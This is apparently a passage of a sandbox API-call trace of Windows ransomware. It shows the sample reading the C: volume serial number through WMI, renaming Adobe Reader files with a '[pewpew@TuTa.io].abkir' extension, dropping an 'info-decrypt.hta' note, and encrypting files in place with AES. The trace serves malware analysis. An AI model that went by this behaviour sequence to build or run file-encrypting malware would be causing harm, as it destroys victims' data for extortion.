WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0193.784] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0193.784] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0193.785] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0193.785] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60276e0) returned 0x0 [0193.785] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0193.785] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0193.785] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0193.785] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0193.785] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.785] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027690) returned 0x0 [0193.798] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027690, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60331bc) returned 0x0 [0194.327] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5ad74) returned 0x0 [0194.327] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ad74, pProxy=0x60331bc, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0194.327] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x1 [0194.327] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5ad94) returned 0x0 [0194.327] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5ad74) returned 0x0 [0194.328] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ad74, pProxy=0x60331bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0194.328] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x2 [0194.328] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0194.328] CoTaskMemFree (pv=0xbe1468) [0194.328] WbemLocator:IUnknown:Release (This=0x6027690) returned 0x0 [0194.328] WbemLocator:IUnknown:QueryInterface (in: This=0x60331bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5ad94) returned 0x0 [0194.328] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0194.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0194.329] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0194.329] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0194.330] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0194.330] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5acf4) returned 0x0 [0194.330] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5acf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.330] WbemLocator:IUnknown:Release (This=0xb5acf4) returned 0x3 [0194.330] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0194.330] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0194.330] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5ad7c) returned 0x0 [0194.331] WbemLocator:IRpcOptions:Query (in: This=0xb5ad7c, pPrx=0xb5ad94, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0194.331] WbemLocator:IUnknown:Release (This=0xb5ad7c) returned 0x3 [0194.331] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0194.331] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0194.331] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0194.331] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60331bc) returned 0x0 [0194.331] WbemLocator:IUnknown:AddRef (This=0x60331bc) returned 0x4 [0194.331] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x3 [0194.331] WbemLocator:IUnknown:Release (This=0x60331bc) returned 0x2 [0194.331] SysStringLen (param_1=0x0) returned 0x0 [0194.331] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0194.331] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0194.331] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.331] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0194.331] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0194.331] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5ad94) returned 0x0 [0194.331] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x3 [0194.331] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0194.332] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0194.332] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.332] IWbemServices:GetObject (in: This=0x60331bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027cb8, ppCallResult=0x0) returned 0x0 [0194.542] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0194.542] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0194.542] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.542] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36811a8*=0, plFlavor=0x36811ac*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36811a8*=8, plFlavor=0x36811ac*=0) returned 0x0 [0194.542] SysStringByteLen (bstr="9C354B42") returned 0x10 [0194.542] SysStringByteLen (bstr="9C354B42") returned 0x10 [0194.542] IWbemClassObject:Get (in: This=0x6027cb8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36811a8*=8, plFlavor=0x36811ac*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36811a8*=8, plFlavor=0x36811ac*=0) returned 0x0 [0194.542] SysStringByteLen (bstr="9C354B42") returned 0x10 [0194.542] SysStringByteLen (bstr="9C354B42") returned 0x10 [0194.543] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", lpFilePart=0x0) returned 0x35 [0194.543] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0194.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0194.543] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x2d3f3340, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0194.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0194.543] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0194.544] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", lpFilePart=0x0) returned 0x35 [0194.544] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0194.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0194.544] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0194.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0194.544] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", lpFilePart=0x0) returned 0x35 [0194.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0194.544] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), fInfoLevelId=0x0, lpFileInformation=0x36816d8 | out: lpFileInformation=0x36816d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1)) returned 1 [0194.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0194.545] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", lpFilePart=0x0) returned 0x35 [0194.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0194.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0194.545] GetFileType (hFile=0x4a8) returned 0x1 [0194.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0194.545] GetFileType (hFile=0x4a8) returned 0x1 [0194.545] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x3fa1 [0194.546] ReadFile (in: hFile=0x4a8, lpBuffer=0x383301c, nNumberOfBytesToRead=0x3fa1, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x383301c*, lpNumberOfBytesRead=0x8f6eedc*=0x3fa1, lpOverlapped=0x0) returned 1 [0194.559] CloseHandle (hObject=0x4a8) returned 1 [0194.559] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bafc0) returned 1 [0194.560] CryptGenRandom (in: hProv=0x66bafc0, dwLen=0x10, pbBuffer=0x3837684 | out: pbBuffer=0x3837684) returned 1 [0195.106] CryptImportKey (in: hProv=0x66bafc0, pbData=0x3a2ba58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7fb10) returned 1 [0195.107] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.107] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.107] CryptDuplicateKey (in: hKey=0xb7fb10, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f850) returned 1 [0195.107] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.107] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x3a2bb38*=0x1, dwFlags=0x0) returned 1 [0195.107] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x3a2bb04, dwFlags=0x0) returned 1 [0195.107] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a2bb48*, pdwDataLen=0x8f6eea8*=0x3fb0, dwBufLen=0x3fb0 | out: pbData=0x3a2bb48*, pdwDataLen=0x8f6eea8*=0x3fb0) returned 1 [0195.107] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3a2fb1c*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3a2fb1c*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0195.109] CryptDestroyKey (hKey=0xb7fb10) returned 1 [0195.109] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0195.109] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0195.109] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm", lpFilePart=0x0) returned 0x35 [0195.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0195.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0195.110] GetFileType (hFile=0x4e0) returned 0x1 [0195.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0195.110] GetFileType (hFile=0x4e0) returned 0x1 [0195.110] WriteFile (in: hFile=0x4e0, lpBuffer=0x3a30120*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3a30120*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0195.111] CloseHandle (hObject=0x4e0) returned 1 [0195.112] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0195.112] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0195.112] CoTaskMemFree (pv=0xbed438) [0195.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0195.112] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0195.112] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0195.112] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0195.112] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.113] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x60276b0) returned 0x0 [0195.113] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0195.113] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030630) returned 0x0 [0195.114] WbemDefPath:IUnknown:Release (This=0x60276b0) returned 0x0 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030630) returned 0x0 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0195.114] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbe2460) returned 0x0 [0195.114] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 